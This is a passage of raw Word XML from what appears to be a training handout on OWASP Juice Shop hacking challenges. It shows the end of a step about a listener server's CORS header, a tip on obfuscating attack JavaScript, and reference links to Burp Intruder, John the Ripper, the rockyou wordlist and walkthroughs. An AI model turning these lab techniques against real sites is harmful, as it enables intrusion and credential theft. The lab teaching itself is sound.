        <w:t>self</w:t>
      </w:r>
      <w:r w:rsidR="007F0156" w:rsidRPr="00E13B49">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007F0156" w:rsidRPr="00E13B49">
        <w:rPr>
          <w:rStyle w:val="pl-en"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>send_header</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007F0156" w:rsidRPr="00E13B49">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BE3137" w:rsidRPr="00E13B49">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00BE3137" w:rsidRPr="00E13B49">
        <w:rPr>
          <w:rStyle w:val="pl-s"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'Access-Control-Allow-Origin'</w:t>
      </w:r>
      <w:r w:rsidR="00BE3137" w:rsidRPr="00E13B49">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00BE3137" w:rsidRPr="00E13B49">
        <w:rPr>
          <w:rStyle w:val="pl-s"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'*')</w:t>
      </w:r>
      <w:r w:rsidR="007F0156">
        <w:rPr>
          <w:rStyle w:val="pl-s"/>
        </w:rPr>
        <w:t>). If you’re using a custom server, you will need to add something equivalent!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399BD95B" w14:textId="5F592B40" w:rsidR="006B1FA5" w:rsidRPr="00FE158E" w:rsidRDefault="006B1FA5" w:rsidP="00FE158E">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="pl-s"/>
        </w:rPr>
        <w:t xml:space="preserve">Final note: There are plenty of libraries available online if you want to further obfuscate your code – for example, you could use a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="pl-s"/>
        </w:rPr>
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="pl-s"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="pl-s"/>
        </w:rPr>
        <w:t>minifier</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="pl-s"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r w:rsidR="00C3139F">
        <w:rPr>
          <w:rStyle w:val="pl-s"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="pl-s"/>
        </w:rPr>
        <w:t xml:space="preserve">], or </w:t>
      </w:r>
      <w:r w:rsidR="00F9642E">
        <w:rPr>
          <w:rStyle w:val="pl-s"/>
        </w:rPr>
        <w:t>rename your variables to something obscure.</w:t>
      </w:r>
      <w:r w:rsidR="00C24739">
        <w:rPr>
          <w:rStyle w:val="pl-s"/>
        </w:rPr>
        <w:t xml:space="preserve"> There are lots of ridiculous syntax tricks within </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C24739">
        <w:rPr>
          <w:rStyle w:val="pl-s"/>
        </w:rPr>
        <w:t>Javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C24739">
        <w:rPr>
          <w:rStyle w:val="pl-s"/>
        </w:rPr>
        <w:t xml:space="preserve"> to take advantage of!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021FB806" w14:textId="77777777" w:rsidR="003A1990" w:rsidRDefault="003A1990" w:rsidP="00950BE7"/>
    <w:p w14:paraId="496C7ADB" w14:textId="136DD73F" w:rsidR="00E2070D" w:rsidRDefault="00E2070D" w:rsidP="00950BE7">
      <w:r>
        <w:t xml:space="preserve">6) You can find all the solutions for the Juice Shop challenges at </w:t>
      </w:r>
      <w:r w:rsidR="00ED4DD6">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00C3139F">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="003B4C57">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00C3139F">
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00912CD6">
        <w:t>,10</w:t>
      </w:r>
      <w:r w:rsidR="00ED4DD6">
        <w:t>]!</w:t>
      </w:r>
      <w:r w:rsidR="00A67437">
        <w:t xml:space="preserve"> They provide detailed explanations of how and why each exploit works – if you have any issues understanding anything, feel free to drop us a message</w:t>
      </w:r>
      <w:r w:rsidR="00AD0FA4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A67437">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A67437">
        <w:t>we’ll</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A67437">
        <w:t xml:space="preserve"> help if we can!</w:t>
      </w:r>
      <w:r w:rsidR="004C684C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004C684C">
        <w:t>Or,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="004C684C">
        <w:t xml:space="preserve"> post in the #juice-shop channel of discord, and see if anyone else has tried the same challenge!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5F9300" w14:textId="0C972259" w:rsidR="00B41407" w:rsidRDefault="00B41407" w:rsidP="00950BE7"/>
    <w:p w14:paraId="1D0D5E6A" w14:textId="773E7684" w:rsidR="00B41407" w:rsidRDefault="00B41407" w:rsidP="00950BE7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Appendix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4E7491" w14:textId="1B7C6613" w:rsidR="00ED4DD6" w:rsidRDefault="00D3587F" w:rsidP="000C7135">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[1] – </w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r w:rsidR="004512D3" w:rsidRPr="008F062C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://portswigger.net/burp/documentation/desktop/tools/intruder</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0E64BA00" w14:textId="6057FC9A" w:rsidR="00C540A6" w:rsidRDefault="00C540A6" w:rsidP="000C7135">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D35B1">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="001611BD">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="005D35B1">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="005D35B1" w:rsidRPr="005D35B1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005D35B1">
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:hyperlink r:id="rId29" w:history="1">
        <w:r w:rsidR="008A7C7E" w:rsidRPr="009942AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.varonis.com/blog/john-the-ripper/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="290381DA" w14:textId="7AF60DF8" w:rsidR="008A7C7E" w:rsidRDefault="008A7C7E" w:rsidP="000C7135">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A7C7E">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="006C5B22">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="008A7C7E">
        <w:t xml:space="preserve">] – </w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidR="00032A63" w:rsidRPr="00DA3982">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="39BE375D" w14:textId="77777777" w:rsidR="00B87DF3" w:rsidRDefault="00032A63" w:rsidP="00B87DF3">
      <w:r w:rsidRPr="00032A63">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00546B5C">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00032A63">
        <w:t xml:space="preserve">] – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidRPr="00032A63">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>ttps://stackoverflow.com/questions/39519246/make-xmlhttprequest-post-using-json</w:t>
      </w:r>
      <w:r w:rsidR="00C85F41">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515EADC5" w14:textId="539EB449" w:rsidR="00B87DF3" w:rsidRDefault="00B87DF3" w:rsidP="00B87DF3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">] – </w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidRPr="008F062C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://gist.github.com/Twigonometry/a619bc5234d39296737e8d00899f23af</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0A77388D" w14:textId="1E95406E" w:rsidR="001329B4" w:rsidRPr="000C7135" w:rsidRDefault="001329B4" w:rsidP="00B87DF3">
      <w:r w:rsidRPr="001329B4">
        <w:t>[6] –</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001329B4">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>https://www.python.org/downloads/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDC4A63" w14:textId="1531AA71" w:rsidR="00856046" w:rsidRPr="000C7135" w:rsidRDefault="00356BE8" w:rsidP="00B87DF3">
      <w:r w:rsidRPr="00BB50BD">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00912CD6" w:rsidRPr="00BB50BD">
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB50BD">
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidR="00BB50BD" w:rsidRPr="00BB50BD">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00BB50BD">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007B6D7C">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>https://javascript-minifier.com/</w:t>
      </w:r>
      <w:r w:rsidR="00B87DF3" w:rsidRPr="000C7135">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358AB43D" w14:textId="1DB8BBC8" w:rsidR="006A7BE2" w:rsidRDefault="00ED4DD6" w:rsidP="006A7BE2">
      <w:r w:rsidRPr="00BB50BD">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00912CD6" w:rsidRPr="00BB50BD">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB50BD">
        <w:t xml:space="preserve">] – </w:t>
      </w:r>
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r w:rsidRPr="00171B53">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://bkimminich.gitbooks.io/pwning-owasp-juice-shop/content/appendix/solutions.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2531594F" w14:textId="5308BAE7" w:rsidR="006A7BE2" w:rsidRDefault="006A7BE2" w:rsidP="006A7BE2">
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00912CD6">
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>] – https://n0j.github.io/2018/08/07/owasp-juice-shop-v7.3.0-level-3.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F78DBFA" w14:textId="4399A2D8" w:rsidR="00856046" w:rsidRPr="00856046" w:rsidRDefault="006A7BE2" w:rsidP="00E02904">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0563C1" w:themeColor="hyperlink"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00912CD6">
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>] – https://github.com/bsqrl/juice-shop-walkthrough</w:t>
      </w:r>
      <w:r w:rsidR="00E02904" w:rsidRPr="00856046">
        <w:rPr>
          <w:color w:val="0563C1" w:themeColor="hyperlink"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00856046" w:rsidRPr="008560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B12F1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="924A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F89"/>
    <w:rsid w:val="00000BA0"/>
    <w:rsid w:val="00012E08"/>
    <w:rsid w:val="00023C7E"/>
    <w:rsid w:val="00025AE7"/>
    <w:rsid w:val="00026D9C"/>
    <w:rsid w:val="00032A63"/>
    <w:rsid w:val="00047219"/>
    <w:rsid w:val="000516C9"/>
    <w:rsid w:val="000520E2"/>
    <w:rsid w:val="00055B87"/>
    <w:rsid w:val="0006426C"/>
    <w:rsid w:val="000723ED"/>
    <w:rsid w:val="000875B3"/>
    <w:rsid w:val="000B7616"/>
    <w:rsid w:val="000C05B7"/>
    <w:rsid w:val="000C7135"/>
    <w:rsid w:val="000D12E3"/>
    <w:rsid w:val="000E696B"/>
    <w:rsid w:val="000E77FF"/>
    <w:rsid w:val="000F7D8D"/>
    <w:rsid w:val="0012471A"/>
    <w:rsid w:val="00125727"/>
    <w:rsid w:val="00127E9E"/>
    <w:rsid w:val="001329B4"/>
    <w:rsid w:val="00143725"/>
    <w:rsid w:val="00143B40"/>
    <w:rsid w:val="001516F3"/>
    <w:rsid w:val="00155B42"/>
    <w:rsid w:val="001611BD"/>
    <w:rsid w:val="00165C25"/>
    <w:rsid w:val="00170457"/>
    <w:rsid w:val="00181844"/>
    <w:rsid w:val="0018539B"/>
    <w:rsid w:val="0019232D"/>
    <w:rsid w:val="001A2A4E"/>
    <w:rsid w:val="001B493E"/>
    <w:rsid w:val="001B66DF"/>
    <w:rsid w:val="001C09C3"/>
    <w:rsid w:val="001D1C32"/>
    <w:rsid w:val="001D68B1"/>
    <w:rsid w:val="001E0491"/>
    <w:rsid w:val="001E315A"/>
    <w:rsid w:val="001E3B5D"/>
    <w:rsid w:val="001E5533"/>
    <w:rsid w:val="001F172F"/>
    <w:rsid w:val="00202F34"/>
    <w:rsid w:val="0021666E"/>
    <w:rsid w:val="00225786"/>
    <w:rsid w:val="002260B4"/>
    <w:rsid w:val="00232278"/>
    <w:rsid w:val="002410F7"/>
    <w:rsid w:val="002458CB"/>
    <w:rsid w:val="00247E7D"/>
    <w:rsid w:val="0025544F"/>
    <w:rsid w:val="00256CE1"/>
    <w:rsid w:val="00257571"/>
    <w:rsid w:val="00262FD4"/>
    <w:rsid w:val="0026680D"/>
    <w:rsid w:val="00267518"/>
    <w:rsid w:val="00272289"/>
    <w:rsid w:val="002924DF"/>
    <w:rsid w:val="00296059"/>
    <w:rsid w:val="00296474"/>
    <w:rsid w:val="002A1155"/>
    <w:rsid w:val="002A252B"/>
    <w:rsid w:val="002A678C"/>
    <w:rsid w:val="002B0482"/>
    <w:rsid w:val="002C0EFB"/>
    <w:rsid w:val="002C406C"/>
    <w:rsid w:val="002C756B"/>
    <w:rsid w:val="002D5546"/>
    <w:rsid w:val="002F0CF3"/>
    <w:rsid w:val="002F4180"/>
    <w:rsid w:val="002F5105"/>
    <w:rsid w:val="003209A3"/>
    <w:rsid w:val="0032748F"/>
    <w:rsid w:val="003472CE"/>
    <w:rsid w:val="00356BE8"/>
    <w:rsid w:val="00363C8B"/>
    <w:rsid w:val="00364FD7"/>
    <w:rsid w:val="0036740B"/>
    <w:rsid w:val="003734FF"/>
    <w:rsid w:val="00375E8D"/>
    <w:rsid w:val="00384AE9"/>
    <w:rsid w:val="003870C4"/>
    <w:rsid w:val="003A1990"/>
    <w:rsid w:val="003B4C57"/>
    <w:rsid w:val="003B7C61"/>
    <w:rsid w:val="003C3ADC"/>
    <w:rsid w:val="003C4065"/>
    <w:rsid w:val="003C474C"/>
    <w:rsid w:val="003E0CC5"/>
    <w:rsid w:val="003E3463"/>
    <w:rsid w:val="003E5707"/>
    <w:rsid w:val="003F61BF"/>
    <w:rsid w:val="0040612A"/>
    <w:rsid w:val="00410CC6"/>
    <w:rsid w:val="004361CB"/>
    <w:rsid w:val="00450227"/>
    <w:rsid w:val="004512D3"/>
    <w:rsid w:val="004723FA"/>
    <w:rsid w:val="00474858"/>
    <w:rsid w:val="00476FBD"/>
    <w:rsid w:val="004829CE"/>
    <w:rsid w:val="00482A9C"/>
    <w:rsid w:val="00483392"/>
    <w:rsid w:val="00484CE0"/>
    <w:rsid w:val="00485266"/>
    <w:rsid w:val="004852FB"/>
    <w:rsid w:val="004A1290"/>
    <w:rsid w:val="004C02EA"/>
    <w:rsid w:val="004C0579"/>
    <w:rsid w:val="004C684C"/>
    <w:rsid w:val="004D08E5"/>
    <w:rsid w:val="004D453E"/>
    <w:rsid w:val="004E4390"/>
    <w:rsid w:val="00507A30"/>
    <w:rsid w:val="005103B9"/>
    <w:rsid w:val="00510791"/>
    <w:rsid w:val="00544BEF"/>
    <w:rsid w:val="00545D3C"/>
    <w:rsid w:val="00546B5C"/>
    <w:rsid w:val="0055235E"/>
    <w:rsid w:val="00557356"/>
    <w:rsid w:val="00575777"/>
    <w:rsid w:val="0057791C"/>
    <w:rsid w:val="005812BE"/>
    <w:rsid w:val="00581559"/>
    <w:rsid w:val="005C5381"/>
    <w:rsid w:val="005C53D9"/>
    <w:rsid w:val="005C5EDF"/>
    <w:rsid w:val="005D35B1"/>
    <w:rsid w:val="005E03CB"/>
    <w:rsid w:val="005F2DAA"/>
    <w:rsid w:val="005F780D"/>
    <w:rsid w:val="00615C9B"/>
    <w:rsid w:val="00621C47"/>
    <w:rsid w:val="00647863"/>
    <w:rsid w:val="00651D87"/>
    <w:rsid w:val="006559E5"/>
    <w:rsid w:val="0066105C"/>
    <w:rsid w:val="0067213D"/>
    <w:rsid w:val="00675FEF"/>
    <w:rsid w:val="00677537"/>
    <w:rsid w:val="00691AC2"/>
    <w:rsid w:val="0069450E"/>
    <w:rsid w:val="006A7BE2"/>
    <w:rsid w:val="006B1FA5"/>
    <w:rsid w:val="006B25AC"/>
    <w:rsid w:val="006B3E54"/>
    <w:rsid w:val="006B5987"/>
    <w:rsid w:val="006C5B22"/>
    <w:rsid w:val="006D19F1"/>
    <w:rsid w:val="006D4CDA"/>
    <w:rsid w:val="006D4EE7"/>
    <w:rsid w:val="006D7B67"/>
    <w:rsid w:val="006D7DC9"/>
    <w:rsid w:val="006E438A"/>
    <w:rsid w:val="007150A9"/>
    <w:rsid w:val="007154FE"/>
    <w:rsid w:val="007213E8"/>
    <w:rsid w:val="00741B13"/>
    <w:rsid w:val="00744C44"/>
    <w:rsid w:val="00745935"/>
    <w:rsid w:val="00755294"/>
    <w:rsid w:val="007609CE"/>
    <w:rsid w:val="00763BA8"/>
    <w:rsid w:val="00764CA9"/>
    <w:rsid w:val="007677FF"/>
    <w:rsid w:val="00776D7F"/>
    <w:rsid w:val="00782C6C"/>
    <w:rsid w:val="007850E8"/>
    <w:rsid w:val="00786C10"/>
    <w:rsid w:val="007873CD"/>
    <w:rsid w:val="007A55EF"/>
    <w:rsid w:val="007A592E"/>
    <w:rsid w:val="007B6D7C"/>
    <w:rsid w:val="007C669D"/>
    <w:rsid w:val="007C7D35"/>
    <w:rsid w:val="007D4644"/>
    <w:rsid w:val="007E52FC"/>
    <w:rsid w:val="007F0156"/>
    <w:rsid w:val="008166AC"/>
    <w:rsid w:val="00825C59"/>
    <w:rsid w:val="00845B81"/>
    <w:rsid w:val="00846320"/>
    <w:rsid w:val="00846BD5"/>
    <w:rsid w:val="00852AE3"/>
    <w:rsid w:val="008552BD"/>
    <w:rsid w:val="00856046"/>
    <w:rsid w:val="0086149A"/>
    <w:rsid w:val="00865A34"/>
    <w:rsid w:val="008833D2"/>
    <w:rsid w:val="00883C98"/>
    <w:rsid w:val="00896837"/>
    <w:rsid w:val="008971F7"/>
    <w:rsid w:val="008A7C7E"/>
    <w:rsid w:val="008B1971"/>
    <w:rsid w:val="008B620C"/>
    <w:rsid w:val="008B720B"/>
    <w:rsid w:val="008C2FD5"/>
    <w:rsid w:val="008C3437"/>
    <w:rsid w:val="008C7208"/>
    <w:rsid w:val="008F03DE"/>
    <w:rsid w:val="008F1ACE"/>
    <w:rsid w:val="009045CA"/>
    <w:rsid w:val="00912CD6"/>
    <w:rsid w:val="009217E8"/>
    <w:rsid w:val="009268BA"/>
    <w:rsid w:val="00943787"/>
    <w:rsid w:val="00950BE7"/>
    <w:rsid w:val="00955466"/>
    <w:rsid w:val="009705F4"/>
    <w:rsid w:val="00975E78"/>
    <w:rsid w:val="00976CB3"/>
    <w:rsid w:val="009831F9"/>
    <w:rsid w:val="00984C11"/>
    <w:rsid w:val="00985125"/>
    <w:rsid w:val="00986165"/>
    <w:rsid w:val="00996882"/>
    <w:rsid w:val="009A28D0"/>
    <w:rsid w:val="009C3578"/>
    <w:rsid w:val="009D2BAA"/>
    <w:rsid w:val="009F283E"/>
    <w:rsid w:val="009F42E9"/>
    <w:rsid w:val="009F5555"/>
    <w:rsid w:val="00A020BC"/>
    <w:rsid w:val="00A05119"/>
    <w:rsid w:val="00A06415"/>
    <w:rsid w:val="00A0788B"/>
    <w:rsid w:val="00A22B2B"/>
    <w:rsid w:val="00A31B93"/>
    <w:rsid w:val="00A3222D"/>
    <w:rsid w:val="00A409EE"/>
    <w:rsid w:val="00A448AD"/>
    <w:rsid w:val="00A461CB"/>
    <w:rsid w:val="00A5586E"/>
    <w:rsid w:val="00A67437"/>
    <w:rsid w:val="00A678B6"/>
    <w:rsid w:val="00A7207C"/>
    <w:rsid w:val="00A73B63"/>
    <w:rsid w:val="00A97ED7"/>
    <w:rsid w:val="00AB2C91"/>
    <w:rsid w:val="00AB3609"/>
    <w:rsid w:val="00AB40C7"/>
    <w:rsid w:val="00AB6A60"/>
    <w:rsid w:val="00AD0ECE"/>
    <w:rsid w:val="00AD0FA4"/>
    <w:rsid w:val="00AD2171"/>
    <w:rsid w:val="00AD7DD2"/>
    <w:rsid w:val="00AE08D0"/>
    <w:rsid w:val="00AE5F17"/>
    <w:rsid w:val="00AF2358"/>
    <w:rsid w:val="00B00DB9"/>
    <w:rsid w:val="00B044E8"/>
    <w:rsid w:val="00B10631"/>
    <w:rsid w:val="00B126A7"/>
    <w:rsid w:val="00B126F0"/>
    <w:rsid w:val="00B156DB"/>
    <w:rsid w:val="00B21CEE"/>
    <w:rsid w:val="00B30507"/>
    <w:rsid w:val="00B41407"/>
    <w:rsid w:val="00B441F9"/>
    <w:rsid w:val="00B52CE8"/>
    <w:rsid w:val="00B55C17"/>
    <w:rsid w:val="00B67A2C"/>
    <w:rsid w:val="00B77864"/>
    <w:rsid w:val="00B82141"/>
    <w:rsid w:val="00B835BF"/>
    <w:rsid w:val="00B87DF3"/>
    <w:rsid w:val="00B9548B"/>
    <w:rsid w:val="00BA324E"/>
    <w:rsid w:val="00BB1058"/>
    <w:rsid w:val="00BB3D8B"/>
    <w:rsid w:val="00BB50BD"/>
    <w:rsid w:val="00BE0BC5"/>
    <w:rsid w:val="00BE3137"/>
    <w:rsid w:val="00C0732F"/>
    <w:rsid w:val="00C1316D"/>
    <w:rsid w:val="00C208C4"/>
    <w:rsid w:val="00C24739"/>
    <w:rsid w:val="00C3139F"/>
    <w:rsid w:val="00C53523"/>
    <w:rsid w:val="00C540A6"/>
    <w:rsid w:val="00C65F67"/>
    <w:rsid w:val="00C75BC0"/>
    <w:rsid w:val="00C85F41"/>
    <w:rsid w:val="00C944F3"/>
    <w:rsid w:val="00C94F7F"/>
    <w:rsid w:val="00C95C0C"/>
    <w:rsid w:val="00CD3F60"/>
    <w:rsid w:val="00CD6792"/>
    <w:rsid w:val="00CE601E"/>
    <w:rsid w:val="00CF3296"/>
    <w:rsid w:val="00D207C4"/>
    <w:rsid w:val="00D20D4E"/>
    <w:rsid w:val="00D3587F"/>
    <w:rsid w:val="00D63156"/>
    <w:rsid w:val="00D648B0"/>
    <w:rsid w:val="00D7645B"/>
    <w:rsid w:val="00D93D12"/>
    <w:rsid w:val="00D968DC"/>
    <w:rsid w:val="00DA25AA"/>
    <w:rsid w:val="00DB2B93"/>
    <w:rsid w:val="00DB4638"/>
    <w:rsid w:val="00DC62E4"/>
    <w:rsid w:val="00DD1F9D"/>
    <w:rsid w:val="00DE3BFE"/>
    <w:rsid w:val="00DF3044"/>
    <w:rsid w:val="00E02904"/>
    <w:rsid w:val="00E042FB"/>
    <w:rsid w:val="00E05823"/>
    <w:rsid w:val="00E12AB6"/>
    <w:rsid w:val="00E12BFB"/>
    <w:rsid w:val="00E13B46"/>
    <w:rsid w:val="00E13B49"/>
    <w:rsid w:val="00E14000"/>
    <w:rsid w:val="00E2070D"/>
    <w:rsid w:val="00E26E4F"/>
    <w:rsid w:val="00E30A16"/>
    <w:rsid w:val="00E35378"/>
    <w:rsid w:val="00E56CE1"/>
    <w:rsid w:val="00E74113"/>
    <w:rsid w:val="00E86B9D"/>
    <w:rsid w:val="00EB5D96"/>
    <w:rsid w:val="00EB7F89"/>
    <w:rsid w:val="00EC06A3"/>
    <w:rsid w:val="00EC3D52"/>
    <w:rsid w:val="00ED4DD6"/>
    <w:rsid w:val="00EE03DF"/>
    <w:rsid w:val="00EE1F26"/>
    <w:rsid w:val="00EE3814"/>
    <w:rsid w:val="00EE46A1"/>
    <w:rsid w:val="00EF0C0D"/>
    <w:rsid w:val="00EF0D0A"/>
    <w:rsid w:val="00F24D15"/>
    <w:rsid w:val="00F40B1C"/>
    <w:rsid w:val="00F44500"/>
    <w:rsid w:val="00F64F0B"/>
    <w:rsid w:val="00F664D0"/>
    <w:rsid w:val="00F753D3"/>
    <w:rsid w:val="00F832AA"/>
    <w:rsid w:val="00F93828"/>
    <w:rsid w:val="00F9642E"/>
    <w:rsid w:val="00FA3EA3"/>
    <w:rsid w:val="00FC3D79"/>
    <w:rsid w:val="00FC4032"/>
    <w:rsid w:val="00FC56C5"/>
    <w:rsid w:val="00FC648E"/>
    <w:rsid w:val="00FD1FD8"/>
    <w:rsid w:val="00FE158E"/>
    <w:rsid w:val="00FE2130"/>
    <w:rsid w:val="00FE5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5D66"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{97DE70EF-0A4B-4F17-91D8-D76CA8E5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B7F89"/>
    <w:pPr>
      <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="44546A" w:themeColor="text2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004512D3"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
